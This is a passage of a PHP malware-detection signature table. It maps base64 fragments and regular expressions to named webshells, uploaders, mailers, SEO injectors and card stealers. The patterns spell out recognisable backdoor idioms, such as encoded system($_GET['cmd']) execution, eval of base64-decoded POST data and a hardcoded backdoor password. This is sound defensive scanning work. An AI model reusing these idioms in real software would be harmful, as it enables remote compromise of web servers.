			'LmNwYW5lbC9jb250YWN0aW5m' => array(STR_CLEARFILE, 'php.hacktool.cpanel_reset_password.003', NULL),
			'O6a1+Pl9Tn1yT8aIhmHtNAq1eNB7EptJ55vVsOfeUbqvHIvgXoIblD' => array(STR_CLEARFILE, 'php.backdoor.filesman.121', NULL),
			'Ly8gU2ltcGxlIFBIUCBVcGxvYWQgU2NyaXB0O' => array(STR_CLEARFILE, 'php.backdoor.uploader.326', NULL),
			'ZDNkM0xqUnVaMlZzTG01bGRB' => array(STR_CLEARFILE, 'php.backdoor.webshell.198', NULL),
			'JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTs' => array(STR_CLEARFILE, 'php.hacktool.mailer.119', NULL),
			'aWYgKHN0cnBvcygkX1NFUlZFUlsnUkVRVUVTVF9VU' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.129', '\$[\w]+[\s]*=[\s]*.aWYgKHN0cn[^;]+;[\s]*eval[\s]*\([\s]*base64_decode[\s]*\([\s]*\$[\w]+[\s]*\)[\s]*\);'),
			'U2lkIEdpZmFya' => array(STR_CLEARFILE, 'php.backdoor.webshell.201', NULL),
			'VoMp3IZN9wp6/kB0JAdHKnYaL9bcggs0ec0SWzTQrf/drykECkZjGHnDuqTlNuW/j4eIiRzKFUESjU9/8B' => array(STR_CLEARFILE, 'php.backdoor.webshell.200', NULL),
			'KCRmaWxlc1siXHg2ZVx4NjFceDZkXHg2NSJdICE9ICcnKSB7ICRmdWxscGF0aCA9ICRfUkVRVUVTVFsiXDE2MFwxNDFceDc0XDE1MCJdIC4gJGZpbGVzW' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.045', NULL),
			'JGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOwokbWVzc2FnZSAuPSAiLS0tLS0tL' => array(STR_CLEAR_LINEMATCH, 'php.phishing.mailer.112', 'eval[\s]*\([\s]*base64_decode[\s]*\(JGlwID0gZ2V0ZW52KCJSRU1PVEVfQURE.{100,}\)[\s]*\);'),
			'YzInXSA9IGJhc2U2NF9lbmNvZGUoYmFzZTY0X2VuY29kZSgoc2VyaWFsaXplKCRfU0VSVkVSKSkp' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.350', 'eval\(base64_decode\([^\)]+YzInXSA9IGJhc2U2NF9lbmNvZGUoYmFzZTY0X2VuY29kZSgoc2VyaWFsaXplKCRfU0VSVkVSKSkp[^;]+\);'),
			'$dizge =' => array(STR_CLEARFILE, 'php.backdoor.uploader.352.04', NULL),
			'CiRVZVhwbG9p' => array(STR_CLEARFILE, 'php.backdoor.uploader.352', NULL),
			'Z2V0X3RlbXBfZGlyKCkuYmFzZTY0X2RlY29kZS' => array(STR_CLEARFILE, 'php.backdoor.uploader.352.02', NULL),
			'Ii9zdHMuemlwIik7Cn0KCj8+Cjw/cGhwCgokdXNlciA9IGdldF9jdXJyZW50X3VzZXIoKTsKJHNp' => array(STR_CLEARFILE, 'php.backdoor.uploader.352.03', NULL),
			'NfZGVjb2RlKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCRVZVhwbG9pVCkpKSk7CmV4aXQ7' => array(STR_CLEARFILE, 'php.spam-seo.redirect.126', NULL),
			'Q0Kew0KZGVmaW5lKCduZXdvODNmMzJmM3Nmc3BvamFwOTItMDMyamc0MycsIDE' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_get_contents.043', 'eval\(base64_decode\(.[\w]+=.\)\);'),
			'c3lzdGVtKCRfR0VUWyJ' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.system.019', 'eval\(base64_decode\(c3lzdGVtKCRfR0VUWyJjbWQiXSk7\)\);'),
			'JFVlWHBsb2lUID0gIlN5MUx6TkZRS3l6Tkw3RzJWMHN2c1lZdzlZcEx' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.shell_dropper.005', '\$[\w]+[\s]*=[\s]*.JFVlWHBsb.{200,}=.;[\s]*eval\(base64_decode\(\$[\w]+\)\);'),
			'@eval(base64_decode(\'aWYoQHByZWdfbWF0Y2goIi9jaGVja291dHxvbmVwYWdlf' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.116', '@eval\(base64_decode\(.aWYoQHByZ[^;]+\);'),
			'IME8p53lyNK0aJ7QwChRwN7VGE9NxLcOZWmPH6o7tvm' => array(STR_CLEARFILE, 'php.backdoor.uploader.362', NULL),
			'a5hbHLqTibXK32jEDRbi1Lu2qneNoNJmbxXXQZOOwCze+wDl2Y60' => array(STR_CLEARFILE, 'php.hacktool.mailer.139', NULL),
			'ICAgICAgICAgIGhlYWRlcigiTG9jYXRpb246ICRyZWRpclRvIik7CiAgICAgICAgICAgIGRpZTsKICAgICAgICB9CiAgICB9Cn0=' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.131', '@eval[\s]*\([\s]*base64_decode[\s]*\(.aWY[^;]+\);'),
			'@eval(base64_decode($_SERVER[\'HTTP_' => array(STR_CLEARFILE, 'php.backdoor.eval_gen.023', NULL),
			'aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm9' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_gen.024', '@eval\(base64_decode\(.aWYoIWRlZmluZWQoImNoYWVKb3U3Iikpew[^;]+\)\);'),
			'ZXZhbChldmFsKGV2YWwoZXZhbChldmFsKGV2YWwoZXZhbChldmFsKGV2YWwoZXZhbChldmFsKGV2YWwoZXZ' => array(STR_CLEARFILE, 'php.backdoor.filesman.136', NULL),
			'aWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSl7DQpmb3JlYWN' => array(STR_CLEARFILE, 'php.backdoor.webshell.218', NULL),
			'ZnVuY3Rpb24gX0hmQlAoJF9JWGt0ZUZF' => array(STR_CLEARFILE, 'php.backdoor.webshell.219', NULL),
			'ZnVuY3Rpb24gX1pYaDkoJF9NRnBGYyl7JF9NRnBGYz1zd' => array(STR_CLEARFILE, 'php.backdoor.webshell.220', NULL),
			'ZnVuY3Rpb24gX0kwQ0ooJF8yZHF0OFMpeyR' => array(STR_CLEARFILE, 'php.backdoor.webshell.222', NULL),
			'ZXVlIGFzICRjdXJyZW50X2RpcikNCiAgICB7DQogICAgICAgIGlm' => array(STR_CLEARFILE, 'php.backdoor.uploader.391', NULL),
			'CURLOPT_COOKIEJAR,$GLOBALS[base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.webshell.229', NULL),
			'DQppZihpc3NldCgkX0dFVFsibm9vYi' => array(STR_CLEARFILE, 'php.backdoor.priv8.003', NULL),
			'PHNjcmlwdCBzcmM9Imh0dHBzOi8v' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.078', 'echo[\s]*eval\(base64_decode\(.PHNjcmlwdCBzcmM9Imh0dHBzOi8v[^;]+\)\);'),
			'EgIlOz4lr9N8CTuz7PfNIcV5JosdW1dV02l' => array(STR_CLEARFILE, 'php.backdoor.generic.092', NULL),
			'ZnVuY3Rpb24gX3VMRWQoJF8zZmthbWh6aSl7JF8z' => array(STR_CLEARFILE, 'php.backdoor.filesman.138', NULL),
			'K1GY5P3JJdv77W+t6O5zAdb0ELE9VnZ5Oee0/FIjX5MaO3/AQ=' => array(STR_CLEARFILE, 'php.malware.cc_stealer.021', NULL),
			'XHg3N1x4NzdceDc3Llx4NzRceDcyXHg3OWFceDY3XHgyZWNceDYz' => array(STR_CLEARFILE, 'php.hacktool.TrYaG.003', NULL),
			'eval(base64_decode(substr($_POST' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.147', 'eval\(base64_decode\(substr\(\$_POST\[\w+\].\d+\)\)\)\;'),
			'HN0cmlwb3MoJF9TRVJWRVJb' => array(STR_CLEARFILE, 'php.spam-seo.redirect.139', NULL),
			'JHRvID0gInRlc3RjaGNla0BnbWFpbC5jb' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.063', NULL),
			'JHNlcnZlciA9ICRfU0VSVkV' => array(STR_CLEARFILE, 'php.backdoor.curl.034', NULL),
		),

		'exit;' => array(STR_TRIGGER,

			'@eval($' => array(STR_TRIGGER,
				'if(sizeof($_GET)<' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.146', 'if\(isset\(\$_GET\[.[\w]+.\]\)\)[^\{]+if\(sizeof\(\$_POST\)<[\d]+\)[\s]*\{[\s]*\$[\w]+.=.{100,1000};[\s]*\}[\s]*if\(sizeof\(\$_GET\)[^\}]+\}[\s]*\$[\w]+[\s]*=[\s]*base64+_decode\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*gzuncompress\(\$[\w]+\);[\s]*\@eval\(\$[\w]+\);[^;]+exit;[\s]*endif;'),
			),

			'echo eval(base64_decode(\'\'));' => array(STR_CLEARFILE, 'php.hacktool.mailer.091', NULL),
			'eval(htmlspecialchars_decode(urldecode(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.011', NULL),
			'$id, $matches) ) { $url_string =' => array(STR_CLEARFILE, 'php.spam-seo.redirect.101', NULL),
		),

		'eval(gzinflate(base64_decode(\'pR' => array(STR_TRIGGER,
			'(\'pRlrc9' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.frmDs-injector.002', 'eval.gzinflate.base64_decode..pRlrc9(u48bM70\/\+AaBhTjGmJol5WbNpJ|o69nN2Zv\+DyrgxbhwwBkJo4qTd)[^>]+\)\)\);'),
			'(\'pRn9c9o49ufczP0PKuPGuHHAGAihiZP' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.frmDs-injector.004', 'eval.gzinflate.base64_decode..pRn9c9o49ufczP0PKuPGuHHAGAihiZP[^>]+\)\)\);'), //new variant by fio
			'(\'pRn9c9o49ufcz' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.frmDs-injector.003', 'eval.gzinflate.base64_decode..pRn9c9o49ufczP0PKuPGuHHAGAihiZN[^>]+\)\)\);'), //updated by PG
			'(\'pRlrb9s48nMOu' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.frmDs-injector.005', 'eval.gzinflate.base64_decode..pRlrb9s48nMOuP[^>]+\)\)\);'), //PG
		),

		'$key' => array(STR_TRIGGER,

			'aWYobWQ1KCRfQ09PS0lF' => array(STR_TRIGGER,
				'YXNlNjRfZGVjb2RlKCRfUE9TVFs' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.064', '\$key\s*=\s*.\w+.\s*\;\s*eval\s*\(base64_decode\(.\w+YXNlNjRfZGVjb2RlKCRfUE9TVFs\w+..\)\);'),
			),
			
			'Xtea' => array(STR_TRIGGER,
				'LyhwcmludHxzcHJpbnR8ZWNobykv' => array(STR_CLEARFILE, 'php.backdoor.filesman.114', NULL),
			),

			'Xtea->block_encrypt' => array(STR_CLEARFILE, 'php.malware.assert.013', NULL),
		),

		'0O' => array(STR_TRIGGER,

			'return openssl_decrypt($' => array(STR_TRIGGER,
				'akRNajlvNzduQUZrY' => array(STR_CLEARFILE, 'php.backdoor.encrypted.005', NULL),
			),

			'\$[0O]+[\s]*=[\s]*base64_decode\([^;]+\);[\s]*(\$[0O]+[\s]*\.?=[\s]*(\$[0O]+\{[\d]+\}[\s]*\.[\s]*)+\$[^;]+\};[\s]*)+eval\(\$[0O]+\([^;]{500,}\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.obfuscated.047', '\$[0O]+[\s]*=[\s]*base64_decode\([^;]+\);[\s]*(\$[0O]+[\s]*\.?=[\s]*(\$[0O]+\{[\d]+\}[\s]*\.[\s]*)+\$[^;]+\};[\s]*)+eval\(\$[0O]+\([^;]{500,}\);'),
			'7Vrrc9s2Ev+czOR/QFldIF308iOpI4tq' => array(STR_CLEARFILE, 'php.backdoor.webshell.217', NULL),
		),

		'<?php echo' => array(STR_TRIGGER,
			']));if($_POST[base64_decode(' => array(STR_TRIGGER,
				'\)\)\{@\$[\w]+\(\$_FILES\[base64_decode\(' => array(REX_TRIGGER,
		
					'file_put_contents(' => array(STR_TRIGGER,
						'file_put_contents\(.[\w]+\.php.,[\s]*.<\?php' => array(REX_CLEAR_LINEMATCH, 'php.malware.base64.037.02', 'file_put_contents\(.[\w]+\.php.,[\s]*.<\?php echo[^>]+\?>.\);'),
					),
					
					'){@$' => array(STR_CLEAR_LINEMATCH, 'php.malware.base64.037', 'echo[\s]*[\d]+[\s]*\+[\s]*[\d]+;[\s]*\$[\w]+[\s]*=[\s]*base64_decode\([^@]+\)\{@\$[^\}]+\};'),
				),
			),
		),

		'@ini_set(\'display_errors\',' => array(STR_TRIGGER,

			'return(eval($' => array(STR_TRIGGER,
				'#!/usr/bin/php -q' => array(STR_TRIGGER,
					'@error_reporting(0);@ini_set(\'display_errors\',false);defined(' => array(STR_CLEARFILE, 'php.malware.obfuscated.026', NULL),
				),
			),

			'str_rot13' => array(STR_TRIGGER,
				'@ini_set(\'output_buffering\',' => array(STR_CLEARFILE, 'php.backdoor.filesman.103', NULL),
			),
		),

		'rror_' => array(STR_TRIGGER,

			'@set_time_limit(' => array(STR_TRIGGER,
				'eval(gzinflate(base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_gen.018', 'error_reporting\(\d+\)\s*;\s*\@?set_time_limit\(\d+\)\s*;\s*eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\([\'"][^\)]+\)\s*\)\s*\)\s*;'),
			),

			'php[\s]*[Ee]rror_[Rr]eporting\([\s]*0[\s]*\);[\s]*eval[\s]*\([\s]*[\w]+[\s]*\([\s]*base64_decode[\s]*\([\s]*.[^)]{30}' => array(REX_CLEAR_LINEMATCH, 'php.malware.generic.079', '[Ee]rror_[Rr]eporting\([\s]*0[\s]*\);[\s]*eval[\s]*\([\s]*[\w]+[\s]*\([\s]*base64_decode[\s]*\([^;]+;'),
		),

		'GIF89a' => array(STR_TRIGGER,

			'$pass' => array(STR_TRIGGER,
				'eval(gzinflate(str_rot13(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.gif89a.001', NULL),
			),

			'(str_rot13(base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.injector.124', NULL),
		),

		'O2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskb' => array(STR_TRIGGER,
			'QAAAOzh3b3cKDQoNI2Zyc29' => array(STR_CLEARFILE, 'php.backdoor.filesman.070', NULL), 
			'GprdHdiZG5ma2RvUmAvI0BLAD5IRUZLVFwgZHBjUyHu4Al' => array(STR_CLEARFILE, 'php.backdoor.filesman.073', NULL),
		),

		'."<"."?";' => array(STR_TRIGGER,
			'("QAAAPD' => array(STR_CLEARFILE, 'php.backdoor.filesman.052', NULL),
			'BACgZGl2J8Fib2R5AIFodG0AAGw+"));' => array(STR_CLEARFILE, 'php.backdoor.filesman.052.02', NULL),
		),

		'bckdrprm"]!="hackmeplz") ) { ?>' => array(STR_CHAIN_TRIGGER,
			'($_REQUEST["bckdrprm"]!="hackmeplz"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.081', '<\? if\([\s]*!isset\(\$_REQUEST\[.bckdrprm.\]\) \|\| \(\$_REQUEST\[.bckdrprm.\][^{]+\{[\s]*\?>'),
			'<?} else { if( isset( $_REQUEST["one"]' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.081.02', '<\?\} else \{ if\( isset\( \$_REQUEST\[.one.\][\s]*\) && isset\([\s]*\$_REQUEST\[.two.\][^>]+check_safe_mode[^\x02]+\?>'),
		),

		'&& md5($_REQUEST[' => array(STR_TRIGGER,
			'eval(base64_decode($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.030','(error_reporting\(0\);[\s]*)?if\(isset\(\$_REQUEST\[.\w+.\]\)\s*\&\&\s*md5\s*\(\$_REQUEST\[.\w+.\]\)\s*==\s*.\w+.\s*\&\&\s*isset\(\$_REQUEST\[.\w+.\]\)\)\s*eval\(base64_decode\(\$_REQUEST\[.\w+.\]\)\);'),
			'error_reporting(0);if(isset($_REQUEST' => array(STR_CLEAR_LINEMATCH,'php.backdoor.eval_POST.041', 'error_reporting\\(0\\);if\\(isset\\(\\$_REQUEST[^&]+&& md5.._REQUEST[^>]+eval[^)]+\\)\\);'),
		),

		'ZXZhbCgnPz4nLi' => array(STR_TRIGGER,
			'};eval($' => array(STR_TRIGGER,
				'\$[0O]{4,}[\s]*=[\s]*base64_decode\(.[\w]{30,}.\);[\s]*\$[0O]{4,}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.webshell.144', '\$[0O]{4,}[\s]*=[\s]*base64_decode\(.[\w]{30,}.\);[\s]*\$[0O]{4,}[^\(]+\};eval\(\$[\w]+\(.[^;]{400}[^;]+\)\);'),
			),
		),

		'filemtime($_SERVER[\'DOCUMENT_ROOT' => array(STR_TRIGGER,
			'chmod($_SERVER[\'SCRIPT_FILENAME' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.062', '\$\w+\s*\=\s*scandir\(\$_SERVER\[.DOCUMENT_ROOT.\][^{]+{\s*if\(stristr[^{]+{\s*\$\w+\s*=\s*filemtime\(\$_SERVER\[.DOCUMENT_ROOT[^}]+}\s*}[\s]*(touch[^;]+;[\s]*|chmod[^;]+;[\s]*)+eval\(base64_decode\([^)]+\)\);'),
		),

		');}elseif(is_string($' => array(STR_TRIGGER,
			';}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.050', 'function [\w_]+\((\$[\w_]+)\)[\s]*\{if.is_array.\1\)\)\{foreach\(\1 as [^\}]++\}elseif\(is_string\(\1[^\n\r]+return \1;\}if\(empty.._SERVER..._SERVER=.HTTP_SERVER_VARS;array_map[^;]+;'),
		),

		'[\'pword\']' => array(STR_TRIGGER,
			'eval(base64_decode(\'JHRhY2ZnZFsndGl0bGUnXSA9ICdYZ3IwdXBW' => array(STR_CLEARFILE, 'php.backdoor.webshell.081', NULL),
		),

		'wOPzyxO";' => array(STR_TRIGGER,
			'eval(base64_decode(gzuncompress(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.filesman.027', NULL),
		),

		'(hex2bin(' => array(STR_TRIGGER,
			'function[\s]*_[\w]+\(\$_[\w]+\)\{\$_[\w]+[^\{]+\{global[\s]*\$_[\w]+;global[^\}]+\)\);\}eval\(eval\([^;]+\)\)\)\);' => array(REX_CLEARFILE, 'php.backdoor.eval_gen.028', NULL),
		),

		'str_split(md5($pass).md5($pass));' => array(STR_TRIGGER,
			'eval(trim(base64_decode(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.WSO.011', NULL),
		),

		'<<<EOT' => array(STR_TRIGGER,
			'\$[\w]+[\s]*=[\s]*<<<EOT[\s]*<div>[\s]*<p>[\s]*(<a href[^\n]+\n){10,}<.p>[\s]*<.div>[\s]*EOT;[\s]*eval[^;]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.298', '\$[\w]+[\s]*=[\s]*<<<EOT[\s]*<div>[\s]*<p>[\s]*(<a href[^\n]+\n){10,}<.p>[\s]*<.div>[\s]*EOT;[\s]*eval[^;]+\);'),
		),

		'if (!touch(' => array(STR_TRIGGER,
			',CURLOPT_URL,base64_decode("aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.015', NULL),
		),

		'Content-Disposition: attachment; filename' => array(STR_TRIGGER,
			'echo gzuncompress(base64_decode(' => array(STR_CLEARFILE, 'php.malware.dropper.044', NULL),
		),

		'<\?(?:php)?\s*(?:\/\*\*\/|\/\*[^\*]+\*\/)?\s*eval\(base64_decode\(.JG' => array(REX_CLEAR_MULTIMATCH, 'rex.malware_generic.018', '<\?(?:php)?\s*(?:\/\*\*\/|\/\*[^\*]+\*\/)?\s*eval\(base64_decode\(.JG[^;]{140,};\s*(?:\?>)?'),
		'return base64_decode\(\$v[0-9A-Z]{6}\);\}' => array(REX_CLEAR_MULTIMATCH, 'rex.WSO_encrypted.001', '<\?php\s*(\$v[0-9A-Z]{6}) = Array\(\'[^\}]+\}\s*[^\}]+base64_decode\(\$v[0-9A-Z]{6}\);\}\s*(\$v[0-9A-Z]{6}) = \'[^>\?]+eval.v[0-9A-Z]{6}.\2, \1..;\s*\?>'),
		'YWRlciA9ICJGcm9tOiAkZnJvbV9zaGVsbGNvZGV' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer.079', '\$(\w+)\s*=\s*["\'][^;]+?YWRlciA9ICJGcm9tOiAkZnJvbV9zaGVsbGNvZGV[^;]+?;\s*eval\s*\(\s*base64_decode\s*\(\s*\$\1\s*\)\s*\)\s*;'),
		'\@\$\w+\(["\'eval\s\.]+\(.eval\(gzinflate\(base64_decode\(\$' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.eval_concat.002', '<\?php[^>]+\@\$\w+\(["\'eval\s\.]+\(.eval\(gzinflate\(base64_decode\(\$[^>]+\?>'),
		'eval[\s]*\([\s]*gzuncompress[\s]*\([\s]*base64_decode[\s]*\([^)]{30}' => array(REX_CLEAR_MULTIMATCH, 'php.malware.generic.019', 'eval[\s]*\([\s]*gz[\w]+[\s]*\([\s]*base64_decode[^\)]*[\)\s;]+'),
		'7L12attTsjD82Tkn/wHh+I7sK1sEN1a0LUK4E9xKQ3EyxweACGPFUxA' => array(STR_CLEARFILE, 'php.backdoor.filesman.079', NULL),
		'JyAuIGdldGN3ZCgpIC4gJzwvY3dkPic7IH0gaWYgKCBpc3NldCAoICR' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.086', 'eval\s*\(\s*base64_decode\s*\([^\+]+\+JyAuIGdldGN3ZCgpIC4gJzwvY3dkPic7IH0gaWYgKCBpc3NldCAoICR[^\)]+\)\s*\);'),
		'ZnVuY3Rpb24gdEx2MmFRQmdQN2VNalJzQWdnT2l' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.determinator.005', 'if\s*\(!defined\s*\(.\w+.\)\)\s*\{eval\(base64_decode\(.ZnVuY3Rpb24gdEx2MmFRQmdQN2VNalJzQWdnT2l[^\(]+\(.[^\.]+\.\s*..[^3]+3'),
		'eNrdfWtX47iy6Oc5a53/YDy92/F0CHFeQIIDNA3d9AN6gH4CJ+M4Tu' => array(STR_CLEARFILE, 'php.backdoor.generic.079', NULL),
		'JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMGtIMGdCNW9OOG1ZOG5COH' => array(STR_CLEARFILE, 'php.backdoor.filesman.068', NULL),
		'JGl4aHBxID0gc3RyaXBzbGFzaGVzKGJhc2U2NF9kZWNvZGUoJF9QT1' => array(STR_CLEARFILE, 'php.hacktool.mailer.078', NULL),
		'TwsGZCk38vaxYIpKTbjOW2ydQUov2VymfSZsxwEkUeeNNyfiYA1qGA' => array(STR_CLEARFILE, 'php.backdoor.filesman.069', NULL),
		'aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3BhcnNlX3' => array(STR_CLEARFILE, 'php.malware.injector.047', NULL),
		'$sData   = gzinflate(ParseCode($sData));' => array(STR_CLEARFILE, 'php.backdoor.webshell.100', NULL),
		'PD9waHANCg0KQGluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTsNCm' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.011', NULL),
		'IndoXploit Shell' => array(STR_CLEARFILE, 'php.backdoor.indoexploit.002', NULL),
		'Xai Syndicate' => array(STR_CLEARFILE, 'php.backdoor.noname_shell.001', NULL),
		'PSBtYWlsKHN0cmlwc2xhc2hlcygk' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer.077', '\$\w+\s*=\s*["\'][^;]+?PSBtYWlsKHN0cmlwc2xhc2hlcygk[^;]+?;\s*eval\(base64_decode[^;]+?;'),
		'LnBocCcsIDA3NzcpOw0KICAgIGZpbGVfcHV0X2NvbnRlbnRz' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.mass-delete.004.02', 'eval\(base64_decode\([\'"][^\)]+LnBocCcsIDA3NzcpOw0KICAgIGZpbGVfcHV0X2NvbnRlbnRz\w+([^\)]+\)\);)?'),
		'MDc3Nyk7DQogICAgdW5saW5rKCd3YXRlcm1hcmsvcHVibGljX2h0bWwnKTsNCn0NCg==' => array(STR_CLEARFILE, 'php.hacktool.mass-delete.004.03', NULL),
		'JHRlc3QgPSAnc3VrYS10ZXN0Jzs' => array(STR_CLEARFILE, 'php.redirect.header_location.015.02', NULL),
		'eval(base64_decode("ZWNobyAnPGI+Jy5waHBfdW5hbWUoKS4n' => array(STR_CLEARFILE, 'php.backdoor.uploader.142', NULL),
		'\$[\w]+[\s]*=[\s]*[\'"][^;]{400}[^;]+;[\s]*eval[\s]*\([\s]*base64_decode[\s]*\([\s]*[\w]+[\s]*\([\s]*[\w]+[\s]*\(' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.generic.078', '\$[\w]+[\s]*=[\s]*[\'"][^;]{400}[^;]+;[\s]*eval[\s]*\([\s]*base64_decode[\s]*\([\s]*[\w]+[\s]*\([\s]*[\w]+[\s]*\([^;]+\)\)\);'),
		'eval(base64_decode("JHBheWxvYWRfZmlsZSA9' => array(STR_CLEARFILE, 'php.malware.dropper.013', NULL),
		'eval(base64_decode(ZWNobyBjb' => array(STR_CLEAR_MULTIMATCH, 'php.dropper.generic.004', '\(\$_GET\[.\w+.\]\s*==\s*.\w+.\)\s*\{\s*eval\(base64_decode\(ZWNobyBjb[^\)]+\)\);\s*\}'),
		'X21hdGNoKCRyZWcsJGZpbGUpKQ0KCQl1bmxpbmsoJGZpbGUpOw0' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.mass-delete.004', 'eval\(base64_decode\(.\w+X21hdGNoKCRyZWcsJGZpbGUpKQ0KCQl1bmxpbmsoJGZpbGUpOw0KfQ==.\)\);'),
		'JGp3YkdXQVY3NTkxID0gIm9hd203Xyg0eXgpNi5jKmRxaWdud' => array(STR_CLEARFILE, 'php.backdoor.generic.075', NULL), 
		'eval(base64_decode(\'QGFycmF5X2RpZmZfdWtleShAYXJy' => array(STR_CLEARFILE, 'php.backdoor.generic.074', NULL),
		'str_rot13(\'VPNiXv%cMvtuVTy_K29v*zIw@~9coy90LKuio' => array(STR_CLEARFILE, 'php.backdoor.webshell.092', NULL),
		'eval(base64_decode("JEkxSWxJbDFsSTE9ZmlsZShwcmVnX' => array(STR_CLEARFILE, 'php.backdoor.generic.071', NULL),
		'eval(base64_decode("Ly83MTg3OWQyMTJkYzhjYmY0ZDRmZ' => array(STR_CLEARFILE, 'php.backdoor.webshell.090', NULL),
		'eval(base64_decode("IGVycm9yX3JlcG9ydGluZygwKTsNC' => array(STR_CLEARFILE, 'php.backdoor.filesman.061', NULL),
		'*/eval/*' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.03','eval\/\*[^\n]+base64_decode[^\n]+;'),
		'eval(base64_decode("CiRhd' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.filesman.001.015','eval.base64_decode..CiRhd[^;]+;'),
		'/*mx_start*/<?php' => array(STR_CLEAR_MULTIMATCH, 'php.malware.mx_start_injector.001', '..mx_start..<\?php\s*\$\w{10,}=(base64_decode..\w{4}..\.){8}[^;]+base64_decode..\w{3}=..;\seval.\$\w+.;\s*\?>..mx_end..'),
		'WSO 2.1.5 Edition r3coded by Kerupuk' => array(STR_CLEARFILE, 'php.backdoor.WSO.001', NULL),
		'BoffMax' => array(STR_CLEARFILE, 'php.backdoor.BoffMax.001', NULL),
		'Stupidc0de' => array(STR_CLEARFILE, 'php.backdoor.Stupidc0de.001', NULL),
		'$xsser=base64_decode($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.045', '\$[\w]+[\s]*=[\s]*\$_POST..[^;]+;[\s]*if[\s]*.\$[\w]+!=..\)[\s]*\{[\s]*\$xsser=base64_decode.._POST[^;]+;[\s]*@eval\([^)]+\);[\s]*}([^s]+set_time_limit\(\d\);[^=]+=\s*dirname\(_FILE_\);[^"]+"\*\.[^\{]+\{\s*unlink[^}]+\}[^\{]+\{\s*unlink\(\$\w+\);\s*\})?'), //updated by YT
		'(base64_decode(\'ZXJyb3JfcmVwb3J0aW5nKDcpOw0KQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsNCm9iX3N0YXJ0KCk7DQokbXRpbWUgIC' => array(STR_CLEARFILE, 'php.backdoor.webshell.074', NULL),
		'eval(base64_decode(\'Ly92ZXJzaW9uIDIKJ' => array(STR_CLEARFILE, 'php.backdoor.webshell.080', NULL),
		'eval(base64_decode(\'LyogNDUzNTQ2Nj' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_gen.010', 'error_reporting.0.;[\s]*eval.base64_decode..LyogNDUzNTQ2Njc3[^;]+\)\);'),
		'=__STUPID__;' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.067', '@ini_set[^;]+?;\s*(?:@ini_set[^;]+?;)?\s*\$auth[^\$]+?(?:\$[^_]\w+\s*=\s*[^;]+?;\s*)+\s*\$_\w+\s*=__STUPID__;\s*\$[^;]+?;\s*eval\(base64_decode\([^;]+?;'),
		'="QAAAOzh3b3cKDWJ1dWh1WHVidwAAaHVzbmlgLzAuPAoNR3RicwAAWGpmYG5kWHZyaHNidFh' => array(STR_CLEARFILE, 'php.backdoor.webshell.101', NULL),
